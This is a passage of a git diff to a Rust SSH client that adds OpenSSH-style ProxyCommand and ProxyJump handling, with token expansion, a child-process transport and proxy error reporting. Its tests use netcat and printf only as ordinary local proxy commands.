-                            tracing::debug!("Channel closed, stopping stderr processing");
-                            break;
-                        }
+                    if output_receiver_open {
+                        output_receiver_open =
+                            forward_command_output(&sender, CommandOutput::StdErr(data.clone()))
+                                .await;
                     }
                 }
 
@@ -432,6 +430,7 @@ impl Client {
         let mut result: Option<u32> = None;
         let mut password_send_count: u32 = 0;
         let mut accumulated_output = String::new();
+        let mut output_receiver_open = true;
 
         // While the channel has messages...
         while let Some(msg) = channel.wait().await {
@@ -454,19 +453,10 @@ impl Client {
                     }
 
                     // Send output to streaming channel
-                    match sender.try_send(CommandOutput::StdOut(data.clone())) {
-                        Ok(_) => {}
-                        Err(tokio::sync::mpsc::error::TrySendError::Full(output)) => {
-                            tracing::trace!("Channel full, applying backpressure for stdout");
-                            if sender.send(output).await.is_err() {
-                                tracing::debug!("Receiver dropped, stopping stdout processing");
-                                break;
-                            }
-                        }
-                        Err(tokio::sync::mpsc::error::TrySendError::Closed(_)) => {
-                            tracing::debug!("Channel closed, stopping stdout processing");
-                            break;
-                        }
+                    if output_receiver_open {
+                        output_receiver_open =
+                            forward_command_output(&sender, CommandOutput::StdOut(data.clone()))
+                                .await;
                     }
 
                     // Check if we need to send the password (supports multiple sudo prompts)
@@ -530,19 +520,10 @@ impl Client {
                         );
                     }
 
-                    match sender.try_send(CommandOutput::StdErr(data.clone())) {
-                        Ok(_) => {}
-                        Err(tokio::sync::mpsc::error::TrySendError::Full(output)) => {
-                            tracing::trace!("Channel full, applying backpressure for stderr");
-                            if sender.send(output).await.is_err() {
-                                tracing::debug!("Receiver dropped, stopping stderr processing");
-                                break;
-                            }
-                        }
-                        Err(tokio::sync::mpsc::error::TrySendError::Closed(_)) => {
-                            tracing::debug!("Channel closed, stopping stderr processing");
-                            break;
-                        }
+                    if output_receiver_open {
+                        output_receiver_open =
+                            forward_command_output(&sender, CommandOutput::StdErr(data.clone()))
+                                .await;
                     }
 
                     // Check if we need to send the password (sudo can prompt on stderr)
@@ -695,6 +676,20 @@ impl Client {
 #[cfg(test)]
 mod tests {
     use super::*;
+
+    #[tokio::test]
+    async fn closed_output_receiver_is_not_a_command_error() {
+        let (sender, receiver) = channel(1);
+        drop(receiver);
+
+        let receiver_open = forward_command_output(
+            &sender,
+            CommandOutput::StdOut(Bytes::from_static(b"ignored")),
+        )
+        .await;
+
+        assert!(!receiver_open);
+    }
 
     fn v4(s: &str) -> SocketAddr {
         s.parse().expect("valid IPv4 socket address")

--- a/src/ssh/tokio_client/connection.rs
+++ b/src/ssh/tokio_client/connection.rs
@@ -25,6 +25,9 @@ use std::{fmt::Debug, io};
 
 use super::address_family::AddressFamily;
 use super::authentication::{AuthMethod, ServerCheckMethod};
+use super::proxy_command::{
+    ProxyCommandConfig, ProxyCommandProcess, ProxyMode, spawn_proxy_command,
+};
 use crate::ssh::SshConfig;
 
 /// Default keepalive interval in seconds.
@@ -104,6 +107,8 @@ pub struct SshConnectionConfig {
 
     /// Explicit known-hosts identity selected by `HostKeyAlias`.
     pub host_key_alias: Option<String>,
+    /// Effective proxy selection for this target.
+    pub proxy_mode: Option<ProxyMode>,
 }
 
 impl Default for SshConnectionConfig {
@@ -116,6 +121,7 @@ impl Default for SshConnectionConfig {
             user_known_hosts_files: None,
             global_known_hosts_files: None,
             host_key_alias: None,
+            proxy_mode: None,
         }
     }
 }
@@ -137,6 +143,8 @@ pub struct SshConnectionConfigResolver {
     yaml_keepalive_max: Option<usize>,
     cli_address_family: Option<AddressFamily>,
     cli_host_key_alias: Option<String>,
+    cli_proxy_jump: Option<String>,
+    yaml_proxy_jump: Option<String>,
 }
 
 impl SshConnectionConfigResolver {
@@ -201,6 +209,22 @@ impl SshConnectionConfigResolver {
         self
     }
 
+    #[must_use]
+    pub fn with_cli_proxy_jump(mut self, jump: Option<String>) -> Self {
+        if let Some(config) = self.fixed_config.as_mut() {
+            config.proxy_mode = jump.as_deref().map(proxy_jump_mode);
+            return self;
+        }
+        self.cli_proxy_jump = jump;
+        self
+    }
+
+    #[must_use]
+    pub fn with_yaml_proxy_jump(mut self, jump: Option<String>) -> Self {
+        self.yaml_proxy_jump = jump;
+        self
+    }
+
     pub fn resolve_for_host(&self, hostname: &str) -> SshConnectionConfig {
         if let Some(config) = &self.fixed_config {
             return config.clone();
@@ -257,6 +281,7 @@ impl SshConnectionConfigResolver {
                 .as_ref()
                 .and_then(|config| config.host_key_alias.clone())
         });
+        let proxy_mode = self.resolve_proxy_mode(hostname, host_key_alias.clone());
 
         SshConnectionConfig::new()
             .with_keepalive_interval(if keepalive_interval == 0 {
@@ -269,6 +294,44 @@ impl SshConnectionConfigResolver {
             .with_address_family(address_family)
             .with_known_hosts_files(user_known_hosts_files, global_known_hosts_files)
             .with_host_key_alias(host_key_alias)
+            .with_proxy_mode(proxy_mode)
+    }
+
+    fn resolve_proxy_mode(
+        &self,
+        hostname: &str,
+        host_key_alias: Option<String>,
+    ) -> Option<ProxyMode> {
+        if let Some(jump) = self.cli_proxy_jump.as_deref() {
+            return Some(proxy_jump_mode(jump));
+        }
+
+        if let Some(ssh_config) = self.ssh_config.as_ref() {
+            let host_config = ssh_config.find_host_config(hostname);
+            if let Some(command) = host_config.proxy_command {
+                if command.eq_ignore_ascii_case("none") {
+                    return Some(ProxyMode::Direct);
+                }
+                return Some(ProxyMode::Command(
+                    ProxyCommandConfig::new(command, hostname)
+                        .with_host_key_alias(host_key_alias)
+                        .with_fdpass(host_config.proxy_use_fdpass.unwrap_or(false)),
+                ));
+            }
+            if let Some(jump) = host_config.proxy_jump {
+                return Some(proxy_jump_mode(&jump));
+            }
+        }
+
+        self.yaml_proxy_jump.as_deref().map(proxy_jump_mode)
+    }
+}
+
+fn proxy_jump_mode(jump: &str) -> ProxyMode {
+    if jump.eq_ignore_ascii_case("none") || jump.is_empty() {
+        ProxyMode::Direct
+    } else {
+        ProxyMode::Jump(jump.to_string())
     }
 }
 
@@ -346,6 +409,12 @@ impl SshConnectionConfig {
     #[must_use]
     pub fn with_address_family(mut self, family: AddressFamily) -> Self {
         self.address_family = family;
+        self
+    }
+
+    #[must_use]
+    pub fn with_proxy_mode(mut self, proxy_mode: Option<ProxyMode>) -> Self {
+        self.proxy_mode = proxy_mode;
         self
     }
 
@@ -445,6 +514,7 @@ pub struct Client {
     /// Public access to the SSH session for jump host operations
     #[allow(private_interfaces)]
     pub session: Arc<Handle<ClientHandler>>,
+    proxy_process: Option<Arc<ProxyCommandProcess>>,
 }
 
 impl Client {
@@ -513,6 +583,19 @@ impl Client {
         ssh_config: &SshConnectionConfig,
     ) -> Result<Self, super::Error> {
         let config = ssh_config.to_russh_config();
+        if let Some(ProxyMode::Command(proxy)) = ssh_config.proxy_mode.as_ref() {
+            let (host, port) = addr.host_port().map_err(super::Error::AddressInvalid)?;
+            return Self::connect_with_proxy_command(
+                &host,
+                port,
+                username,
+                auth,
+                server_check,
+                config,
+                proxy,
+            )
+            .await;
+        }
         let tcp_keepalive = ssh_config.to_tcp_keepalive();
         Self::connect_with_config_inner(
             addr,
@@ -524,6 +607,66 @@ impl Client {
             ssh_config.address_family,
         )
         .await
+    }
+
+    async fn connect_with_proxy_command(
+        host: &str,
+        port: u16,
+        username: &str,
+        auth: AuthMethod,
+        server_check: ServerCheckMethod,
+        config: Config,
+        proxy: &ProxyCommandConfig,
+    ) -> Result<Self, super::Error> {
+        let proxy_session = spawn_proxy_command(proxy, host, port, username)?;
+        let process = Arc::clone(&proxy_session.process);
+        let address = SocketAddr::new(std::net::IpAddr::V4(std::net::Ipv4Addr::UNSPECIFIED), port);
+        let verification_host = proxy.host_key_alias.as_deref().unwrap_or(host);
+        // OpenSSH looks up HostKeyAlias literally, without adding the target
+        // port even when it is non-standard.
+        let verification_port = if proxy.host_key_alias.is_some() {
+            22
+        } else {
+            port
+        };
+        let verification_address = SocketAddr::new(
+            std::net::IpAddr::V4(std::net::Ipv4Addr::UNSPECIFIED),
+            verification_port,
+        );
+        let handler = ClientHandler {
+            hostname: verification_host.to_string(),
+            host: verification_address,
+            server_check,
+        };
+        let mut handle =
+            match russh::client::connect_stream(Arc::new(config), proxy_session.stream, handler)
+                .await
+            {
+                Ok(handle) => handle,
+                Err(error) => {
+                    if let Some(failure) =
+                        process.wait_for_failure(Duration::from_millis(250)).await
+                    {
+                        return Err(super::Error::ProxyCommandFailed {
+                            command: failure.command,
+                            status: failure.status,
+                            stderr: failure.stderr,
+                        });
+                    }
+                    return Err(error);
+                }
+            };
+
+        let username = username.to_string();
+        super::authentication::authenticate(&mut handle, &username, auth).await?;
+        let connection_handle = Arc::new(handle);
+        Ok(Self {
+            connection_handle: Arc::clone(&connection_handle),
+            username,
+            address,
+            session: connection_handle,
+            proxy_process: Some(process),
+        })
     }
 
     /// Same as `connect`, but with the option to specify a non default
@@ -645,6 +788,7 @@ impl Client {
             username,
             address,
             session: connection_handle,
+            proxy_process: None,
         })
     }
 
@@ -662,6 +806,7 @@ impl Client {
             username,
             address,
             session: handle,
+            proxy_process: None,
         }
     }
 
@@ -677,10 +822,15 @@ impl Client {
 
     /// Disconnect from the remote host.
     pub async fn disconnect(&self) -> Result<(), super::Error> {
-        self.connection_handle
+        let result = self
+            .connection_handle
             .disconnect(russh::Disconnect::ByApplication, "", "")
             .await
-            .map_err(super::Error::SshError)
+            .map_err(super::Error::SshError);
+        if let Some(process) = &self.proxy_process {
+            process.terminate();
+        }
+        result
     }
 
     /// Check if the connection is closed.
@@ -740,6 +890,7 @@ impl Debug for Client {
         f.debug_struct("Client")
             .field("username", &self.username)
             .field("address", &self.address)
+            .field("proxy_command", &self.proxy_process.is_some())
             .field("connection_handle", &"Handle<ClientHandler>")
             .finish()
     }

--- a/src/ssh/tokio_client/connection_tests.rs
+++ b/src/ssh/tokio_client/connection_tests.rs
@@ -22,9 +22,12 @@
 //! Regression coverage for #246: `-4`/`-6` and the ssh_config `AddressFamily`
 //! keyword were parsed but never consumed on the connect path.
 
+use std::time::Duration;
+
 use super::address_family::AddressFamily;
 use super::authentication::{AuthMethod, ServerCheckMethod};
 use super::connection::{Client, SshConnectionConfig, SshConnectionConfigResolver};
+use super::proxy_command::{ProxyCommandConfig, ProxyMode};
 use crate::ssh::SshConfig;
 
 #[test]
@@ -257,9 +260,216 @@ async fn test_forced_ipv4_with_no_ipv4_candidate_fails_with_specific_error() {
     assert_eq!(err.to_string(), "no IPv4 address found for ::1");
 }
 
+#[test]
+fn test_proxy_resolution_keeps_first_ssh_config_directive() {
+    let command_first = SshConfig::parse(
+        r#"
+Host target
+    ProxyCommand nc %h %p
+    ProxyJump ignored.example.com
+"#,
+    )
+    .expect("valid ssh_config");
+    let config = SshConnectionConfigResolver::new()
+        .with_ssh_config(Some(command_first))
+        .resolve_for_host("target");
+    assert!(matches!(config.proxy_mode, Some(ProxyMode::Command(_))));
+
+    let jump_first = SshConfig::parse(
+        r#"
+Host target
+    ProxyJump bastion.example.com
+    ProxyCommand nc %h %p
+"#,
+    )
+    .expect("valid ssh_config");
+    let config = SshConnectionConfigResolver::new()
+        .with_ssh_config(Some(jump_first))
+        .resolve_for_host("target");
+    assert_eq!(
+        config.proxy_mode,
+        Some(ProxyMode::Jump("bastion.example.com".to_string()))
+    );
+}
+
+#[test]
+fn test_cli_proxy_jump_overrides_ssh_config_proxy_command() {
+    let ssh_config = SshConfig::parse(
+        r#"
+Host target
+    ProxyCommand nc %h %p
+"#,
+    )
+    .expect("valid ssh_config");
+    let config = SshConnectionConfigResolver::new()
+        .with_ssh_config(Some(ssh_config))
+        .with_cli_proxy_jump(Some("cli-bastion.example.com".to_string()))
+        .resolve_for_host("target");
+
+    assert_eq!(
+        config.proxy_mode,
+        Some(ProxyMode::Jump("cli-bastion.example.com".to_string()))
+    );
+}
+
+#[test]
+fn test_proxy_tokens_use_effective_alias_original_and_resolved_hosts() {
+    let ssh_config = SshConfig::parse(
+        r#"
+Host original-host
+    HostKeyAlias config-key-alias
+    ProxyCommand printf '%h|%k|%n'
+"#,
+    )
+    .expect("valid ssh_config");
+    let config = SshConnectionConfigResolver::new()
+        .with_ssh_config(Some(ssh_config))
+        .with_cli_host_key_alias(Some("cli-key-alias".to_string()))
+        .resolve_for_host("original-host");
+
+    assert_eq!(config.host_key_alias.as_deref(), Some("cli-key-alias"));
+    let Some(ProxyMode::Command(command)) = config.proxy_mode else {
+        panic!("ProxyCommand must win for original-host");
+    };
+    assert_eq!(
+        command
+            .expand("resolved.internal", 2222, "alice")
+            .expect("valid proxy tokens"),
+        "printf 'resolved.internal|cli-key-alias|original-host'"
+    );
+}
+
+#[test]
+fn test_proxy_none_disables_yaml_jump_fallback() {
+    for directive in ["ProxyCommand none", "ProxyJump none"] {
+        let ssh_config =
+            SshConfig::parse(&format!("Host target\n    {directive}\n")).expect("valid ssh_config");
+        let config = SshConnectionConfigResolver::new()
+            .with_ssh_config(Some(ssh_config))
+            .with_yaml_proxy_jump(Some("yaml-bastion.example.com".to_string()))
+            .resolve_for_host("target");
+        assert_eq!(config.proxy_mode, Some(ProxyMode::Direct));
+    }
+}
+
+#[test]
+fn test_yaml_jump_is_used_only_as_proxy_fallback() {
+    let config = SshConnectionConfigResolver::new()
+        .with_yaml_proxy_jump(Some("yaml-bastion.example.com".to_string()))
+        .resolve_for_host("target");
+
+    assert_eq!(
+        config.proxy_mode,
+        Some(ProxyMode::Jump("yaml-bastion.example.com".to_string()))
+    );
+}
+
+#[cfg(unix)]
+#[tokio::test]
+async fn test_proxy_command_routes_ssh_transport_through_child() {
+    use tokio::io::{AsyncReadExt, AsyncWriteExt};
+
+    let listener = tokio::net::TcpListener::bind(("127.0.0.1", 0))
+        .await
+        .expect("bind proxy target");
+    let proxy_port = listener.local_addr().unwrap().port();
+    let server = tokio::spawn(async move {
+        let (mut stream, _) = tokio::time::timeout(Duration::from_secs(3), listener.accept())
+            .await
+            .expect("ProxyCommand did not connect")
+            .expect("accept ProxyCommand connection");
+        let mut banner = [0_u8; 256];
+        let read = tokio::time::timeout(Duration::from_secs(3), stream.read(&mut banner))
+            .await
+            .expect("SSH client did not send a banner")
+            .expect("read SSH client banner");
+        assert!(banner[..read].starts_with(b"SSH-2.0-"));
+        stream
+            .write_all(b"SSH-2.0-OpenSSH_9.9\r\n")
+            .await
+            .expect("write test server banner");
+    });
+
+    let command = format!(
+        "sh -c 'test \"$1\" = unresolvable.invalid && test \"$2\" = 2222 && test \"$3\" = alice && test \"$4\" = target-alias && test \"$5\" = key-alias && exec nc 127.0.0.1 \"$6\"' sh %h %p %r %n %k {proxy_port}"
+    );
+    let proxy = ProxyCommandConfig::new(command, "target-alias")
+        .with_host_key_alias(Some("key-alias".to_string()));
+    let config = SshConnectionConfig::new().with_proxy_mode(Some(ProxyMode::Command(proxy)));
+    let connect = Client::connect_with_ssh_config(
+        "unresolvable.invalid:2222",
+        "alice",
+        AuthMethod::with_password("unused"),
+        ServerCheckMethod::NoCheck,
+        &config,
+    );
+    let error = tokio::time::timeout(Duration::from_secs(5), connect)
+        .await
+        .expect("proxy-backed SSH handshake timed out")
+        .expect_err("the deliberately incomplete SSH server must fail");
+    assert!(
+        !matches!(error, super::Error::ProxyCommandFailed { .. }),
+        "proxy child should have transported the SSH banner: {error:?}"
+    );
+    server.await.expect("proxy target task");
+}
+
+#[cfg(unix)]
+#[tokio::test]
+async fn test_proxy_command_failure_is_actionable_at_connection_boundary() {
+    let proxy = ProxyCommandConfig::new(
+        "sh -c 'printf connection\\ proxy\\ failed >&2; exit 23'",
+        "target-alias",
+    );
+    let config = SshConnectionConfig::new().with_proxy_mode(Some(ProxyMode::Command(proxy)));
+    let error = Client::connect_with_ssh_config(
+        "unresolvable.invalid:2222",
+        "alice",
+        AuthMethod::with_password("unused"),
+        ServerCheckMethod::NoCheck,
+        &config,
+    )
+    .await
+    .expect_err("failed ProxyCommand must fail the connection");
+
+    match error {
+        super::Error::ProxyCommandFailed {
+            command,
+            status,
+            stderr,
+        } => {
+            assert!(command.contains("exit 23"));
+            assert!(status.contains("23"));
+            assert_eq!(stderr, "connection proxy failed");
+        }
+        other => panic!("expected actionable ProxyCommand error, got: {other:?}"),
+    }
+}
+
+#[tokio::test]
+async fn test_proxy_use_fdpass_is_rejected_at_connection_boundary() {
+    let proxy = ProxyCommandConfig::new("unused", "target-alias").with_fdpass(true);
+    let config = SshConnectionConfig::new().with_proxy_mode(Some(ProxyMode::Command(proxy)));
+    let error = Client::connect_with_ssh_config(
+        "unresolvable.invalid:2222",
+        "alice",
+        AuthMethod::with_password("unused"),
+        ServerCheckMethod::NoCheck,
+        &config,
+    )
+    .await
+    .expect_err("ProxyUseFdpass must be rejected explicitly");
+
+    assert!(matches!(
+        error,
+        super::Error::ProxyUseFdpassUnsupported { .. }
+    ));
+}
+
 /// With no family forced, an unreachable address must still produce the
 /// ordinary connection error rather than the new family-specific one, proving
 /// the default path is unchanged.
+
 #[tokio::test]
 async fn test_unforced_family_does_not_produce_the_family_error() {
     // Port 0 is never connectable, so this fails fast at the TCP layer without

--- a/src/ssh/tokio_client/error.rs
+++ b/src/ssh/tokio_client/error.rs
@@ -20,6 +20,24 @@ pub enum Error {
     PasswordWrong,
     #[error("Invalid address was provided: {0}")]
     AddressInvalid(io::Error),
+    #[error("ProxyCommand '{command}' contains unsupported token '{token}'")]
+    InvalidProxyCommandToken { command: String, token: String },
+    #[error("Failed to start ProxyCommand '{command}': {source}")]
+    ProxyCommandSpawn {
+        command: String,
+        #[source]
+        source: io::Error,
+    },
+    #[error("ProxyCommand '{command}' failed ({status}): {stderr}")]
+    ProxyCommandFailed {
+        command: String,
+        status: String,
+        stderr: String,
+    },
+    #[error(
+        "ProxyUseFdpass yes is not supported for ProxyCommand '{command}'; remove ProxyUseFdpass or set it to no"
+    )]
+    ProxyUseFdpassUnsupported { command: String },
     /// An address family was forced (`-4`/`-6`, or ssh_config `AddressFamily`)
     /// and name resolution produced no address of that family. This is a hard
     /// failure with no fallback to the other family, matching OpenSSH, and it

--- a/src/ssh/tokio_client/mod.rs
+++ b/src/ssh/tokio_client/mod.rs
@@ -22,6 +22,7 @@ pub mod connection;
 mod connection_tests;
 pub mod error;
 pub mod file_transfer;
+mod proxy_command;
 // `pub(crate)` so the client-facing error message builders in `ssh::client` can
 // reuse `known_hosts_entry_name` instead of duplicating the `[host]:port` rule.
 pub(crate) mod host_verification;
@@ -36,6 +37,7 @@ pub use connection::{
     SshConnectionConfigResolver,
 };
 pub use error::Error;
+pub use proxy_command::{ProxyCommandConfig, ProxyMode};
 pub use to_socket_addrs_with_hostname::ToSocketAddrsWithHostname;
 
 // Re-export russh types commonly used with this module

--- a/src/ssh/tokio_client/proxy_command.rs
+++ b/src/ssh/tokio_client/proxy_command.rs
@@ -1,0 +1,428 @@
+//! OpenSSH-compatible `ProxyCommand` transport support.
+
+use std::ffi::OsString;
+use std::fmt;
+use std::io;
+use std::pin::Pin;
+use std::process::ExitStatus;
+use std::sync::{Arc, Mutex};
+use std::task::{Context, Poll};
+use std::time::Duration;
+
+use tokio::io::{AsyncRead, AsyncReadExt, AsyncWrite, ReadBuf};
+use tokio::process::{ChildStderr, Command};
+use tokio::sync::Notify;
+use tokio::task::AbortHandle;
+
+use super::Error;
+
+const MAX_CAPTURED_STDERR: usize = 64 * 1024;
+
+/// A proxy decision resolved from command-line, ssh_config, and YAML inputs.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum ProxyMode {
+    /// An explicit `ProxyCommand none` or `ProxyJump none` disables fallback.
+    Direct,
+    /// Connect through an ssh_config `ProxyCommand` child process.
+    Command(ProxyCommandConfig),
+    /// Connect through one or more jump hosts.
+    Jump(String),
+}
+
+/// The unexpanded `ProxyCommand` and the context needed by its percent tokens.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct ProxyCommandConfig {
+    pub command: String,
+    pub original_host: String,
+    pub host_key_alias: Option<String>,
+    pub use_fdpass: bool,
+}
+
+impl ProxyCommandConfig {
+    #[must_use]
+    pub fn new(command: impl Into<String>, original_host: impl Into<String>) -> Self {
+        Self {
+            command: command.into(),
+            original_host: original_host.into(),
+            host_key_alias: None,
+            use_fdpass: false,
+        }
+    }
+
+    #[must_use]
+    pub fn with_host_key_alias(mut self, alias: Option<String>) -> Self {
+        self.host_key_alias = alias;
+        self
+    }
+
+    #[must_use]
+    pub fn with_fdpass(mut self, enabled: bool) -> Self {
+        self.use_fdpass = enabled;
+        self
+    }
+
+    pub fn expand(&self, host: &str, port: u16, remote_user: &str) -> Result<String, Error> {
+        let key_alias = self
+            .host_key_alias
+            .as_deref()
+            .unwrap_or(&self.original_host);
+        let port = port.to_string();
+        let mut expanded = String::with_capacity(self.command.len());
+        let mut chars = self.command.chars();
+
+        while let Some(ch) = chars.next() {
+            if ch != '%' {
+                expanded.push(ch);
+                continue;
+            }
+
+            let Some(token) = chars.next() else {
+                return Err(Error::InvalidProxyCommandToken {
+                    command: self.command.clone(),
+                    token: "%".to_string(),
+                });
+            };
+            match token {
+                '%' => expanded.push('%'),
+                'h' => expanded.push_str(host),
+                'k' => expanded.push_str(key_alias),
+                'n' => expanded.push_str(&self.original_host),
+                'p' => expanded.push_str(&port),
+                'r' => expanded.push_str(remote_user),
+                other => {
+                    return Err(Error::InvalidProxyCommandToken {
+                        command: self.command.clone(),
+                        token: format!("%{other}"),
+                    });
+                }
+            }
+        }
+
+        Ok(expanded)
+    }
+}
+
+/// The split stdout/stdin pair presented to russh as one duplex stream.
+pub(crate) struct ProxyCommandStream {
+    stdout: tokio::process::ChildStdout,
+    stdin: tokio::process::ChildStdin,
+}
+
+impl AsyncRead for ProxyCommandStream {
+    fn poll_read(
+        mut self: Pin<&mut Self>,
+        cx: &mut Context<'_>,
+        buf: &mut ReadBuf<'_>,
+    ) -> Poll<io::Result<()>> {
+        Pin::new(&mut self.stdout).poll_read(cx, buf)
+    }
+}
+
+impl AsyncWrite for ProxyCommandStream {
+    fn poll_write(
+        mut self: Pin<&mut Self>,
+        cx: &mut Context<'_>,
+        buf: &[u8],
+    ) -> Poll<Result<usize, io::Error>> {
+        Pin::new(&mut self.stdin).poll_write(cx, buf)
+    }
+
+    fn poll_flush(mut self: Pin<&mut Self>, cx: &mut Context<'_>) -> Poll<Result<(), io::Error>> {
+        Pin::new(&mut self.stdin).poll_flush(cx)
+    }
+
+    fn poll_shutdown(
+        mut self: Pin<&mut Self>,
+        cx: &mut Context<'_>,
+    ) -> Poll<Result<(), io::Error>> {
+        Pin::new(&mut self.stdin).poll_shutdown(cx)
+    }
+}
+
+#[derive(Debug)]
+struct ProxyCompletion {
+    status: Result<ExitStatus, String>,
+    stderr: Vec<u8>,
+}
+
+#[derive(Debug)]
+struct ProxyProcessState {
+    command: String,
+    completion: Mutex<Option<ProxyCompletion>>,
+    completed: Notify,
+}
+
+impl ProxyProcessState {
+    fn record(&self, status: io::Result<ExitStatus>, stderr: Vec<u8>) {
+        let completion = ProxyCompletion {
+            status: status.map_err(|error| error.to_string()),
+            stderr,
+        };
+        *self
+            .completion
+            .lock()
+            .expect("proxy completion mutex poisoned") = Some(completion);
+        self.completed.notify_waiters();
+    }
+
+    fn failure(&self) -> Option<ProxyFailure> {
+        let completion = self
+            .completion
+            .lock()
+            .expect("proxy completion mutex poisoned");
+        let completion = completion.as_ref()?;
+        let status = match &completion.status {
+            Ok(status) if status.success() => return None,
+            Ok(status) => status.to_string(),
+            Err(error) => format!("could not read exit status: {error}"),
+        };
+        let stderr = String::from_utf8_lossy(&completion.stderr)
+            .trim()
+            .to_string();
+
+        Some(ProxyFailure {
+            command: self.command.clone(),
+            status,
+            stderr: if stderr.is_empty() {
+                "no stderr output".to_string()
+            } else {
+                stderr
+            },
+        })
+    }
+
+    async fn wait_for_failure(&self, wait: Duration) -> Option<ProxyFailure> {
+        if self
+            .completion
+            .lock()
+            .expect("proxy completion mutex poisoned")
+            .is_none()
+        {
+            let notified = self.completed.notified();
+            if self
+                .completion
+                .lock()
+                .expect("proxy completion mutex poisoned")
+                .is_none()
+            {
+                let _ = tokio::time::timeout(wait, notified).await;
+            }
+        }
+        self.failure()
+    }
+}
+
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub(crate) struct ProxyFailure {
+    pub command: String,
+    pub status: String,
+    pub stderr: String,
+}
+
+/// Keeps the proxy child monitor alive for exactly as long as the SSH client.
+pub(crate) struct ProxyCommandProcess {
+    state: Arc<ProxyProcessState>,
+    monitor: AbortHandle,
+}
+
+impl ProxyCommandProcess {
+    pub(crate) async fn wait_for_failure(&self, wait: Duration) -> Option<ProxyFailure> {
+        self.state.wait_for_failure(wait).await
+    }
+
+    pub(crate) fn terminate(&self) {
+        self.monitor.abort();
+    }
+}
+
+impl fmt::Debug for ProxyCommandProcess {
+    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
+        f.debug_struct("ProxyCommandProcess")
+            .field("command", &self.state.command)
+            .finish_non_exhaustive()
+    }
+}
+
+impl Drop for ProxyCommandProcess {
+    fn drop(&mut self) {
+        self.terminate();
+    }
+}
+
+pub(crate) struct ProxyCommandSession {
+    pub stream: ProxyCommandStream,
+    pub process: Arc<ProxyCommandProcess>,
+}
+
+/// Spawn a proxy via the user's shell, matching OpenSSH's `exec <command>` form.
+pub(crate) fn spawn_proxy_command(
+    config: &ProxyCommandConfig,
+    host: &str,
+    port: u16,
+    remote_user: &str,
+) -> Result<ProxyCommandSession, Error> {
+    if config.use_fdpass {
+        return Err(Error::ProxyUseFdpassUnsupported {
+            command: config.command.clone(),
+        });
+    }
+
+    let expanded = config.expand(host, port, remote_user)?;
+    let mut command = shell_command(&expanded);
+    command
+        .stdin(std::process::Stdio::piped())
+        .stdout(std::process::Stdio::piped())
+        .stderr(std::process::Stdio::piped())
+        .kill_on_drop(true);
+
+    let mut child = command.spawn().map_err(|source| Error::ProxyCommandSpawn {
+        command: expanded.clone(),
+        source,
+    })?;
+    let stdin = child.stdin.take().ok_or_else(|| Error::ProxyCommandSpawn {
+        command: expanded.clone(),
+        source: io::Error::other("proxy child stdin was not captured"),
+    })?;
+    let stdout = child
+        .stdout
+        .take()
+        .ok_or_else(|| Error::ProxyCommandSpawn {
+            command: expanded.clone(),
+            source: io::Error::other("proxy child stdout was not captured"),
+        })?;
+    let stderr = child
+        .stderr
+        .take()
+        .ok_or_else(|| Error::ProxyCommandSpawn {
+            command: expanded.clone(),
+            source: io::Error::other("proxy child stderr was not captured"),
+        })?;
+
+    let state = Arc::new(ProxyProcessState {
+        command: expanded,
+        completion: Mutex::new(None),
+        completed: Notify::new(),
+    });
+    let monitor_state = Arc::clone(&state);
+    let monitor = tokio::spawn(async move {
+        let stderr_task = tokio::spawn(drain_stderr(stderr));
+        let status = child.wait().await;
+        let stderr = stderr_task.await.unwrap_or_default();
+        monitor_state.record(status, stderr);
+    });
+    let monitor = monitor.abort_handle();
+
+    Ok(ProxyCommandSession {
+        stream: ProxyCommandStream { stdout, stdin },
+        process: Arc::new(ProxyCommandProcess { state, monitor }),
+    })
+}
+
+async fn drain_stderr(mut stderr: ChildStderr) -> Vec<u8> {
+    let mut captured = Vec::new();
+    let mut buffer = [0_u8; 4096];
+    let mut truncated = false;
+
+    while let Ok(read) = stderr.read(&mut buffer).await {
+        if read == 0 {
+            break;
+        }
+        let remaining = MAX_CAPTURED_STDERR.saturating_sub(captured.len());
+        if remaining > 0 {
+            captured.extend_from_slice(&buffer[..read.min(remaining)]);
+        }
+        truncated |= read > remaining;
+    }
+
+    if truncated {
+        captured.extend_from_slice(b"\n[proxy stderr truncated]");
+    }
+    captured
+}
+
+#[cfg(unix)]
+fn shell_command(command: &str) -> Command {
+    let shell = std::env::var_os("SHELL")
+        .filter(|value| !value.is_empty())
+        .unwrap_or_else(|| OsString::from("/bin/sh"));
+    let mut process = Command::new(shell);
+    process.arg("-c").arg(format!("exec {command}"));
+    process
+}
+
+#[cfg(windows)]
+fn shell_command(command: &str) -> Command {
+    let shell = std::env::var_os("COMSPEC")
+        .filter(|value| !value.is_empty())
+        .unwrap_or_else(|| OsString::from("cmd.exe"));
+    let mut process = Command::new(shell);
+    process.arg("/C").arg(command);
+    process
+}
+
+#[cfg(test)]
+mod tests {
+    use tokio::io::AsyncReadExt;
+
+    use super::*;
+
+    #[test]
+    fn expands_all_openssh_proxy_tokens() {
+        let config = ProxyCommandConfig::new("echo %% %h %k %n %p %r", "original.example.com")
+            .with_host_key_alias(Some("key-alias.example.com".to_string()));
+
+        assert_eq!(
+            config.expand("target.internal", 2200, "alice").unwrap(),
+            "echo % target.internal key-alias.example.com original.example.com 2200 alice"
+        );
+    }
+
+    #[test]
+    fn rejects_unknown_proxy_tokens() {
+        let config = ProxyCommandConfig::new("echo %x", "target");
+        let error = config.expand("target", 22, "alice").unwrap_err();
+        assert!(matches!(error, Error::InvalidProxyCommandToken { .. }));
+        assert!(error.to_string().contains("%x"));
+    }
+
+    #[tokio::test]
+    async fn shell_pipeline_is_preserved() {
+        let config = ProxyCommandConfig::new("printf PROXY | tr A-Z a-z", "target");
+        let mut session = spawn_proxy_command(&config, "target", 22, "alice").unwrap();
+        let mut output = String::new();
+        session.stream.read_to_string(&mut output).await.unwrap();
+        assert_eq!(output, "proxy");
+        assert!(
+            session
+                .process
+                .wait_for_failure(Duration::from_secs(1))
+                .await
+                .is_none()
+        );
+    }
+
+    #[tokio::test]
+    async fn failure_captures_exit_status_and_stderr() {
+        let config =
+            ProxyCommandConfig::new("sh -c 'printf proxy\\ exploded >&2; exit 42'", "target");
+        let session = spawn_proxy_command(&config, "target", 22, "alice").unwrap();
+        let failure = session
+            .process
+            .wait_for_failure(Duration::from_secs(1))
+            .await
+            .expect("proxy must fail");
+        assert!(failure.status.contains("42"));
+        assert_eq!(failure.stderr, "proxy exploded");
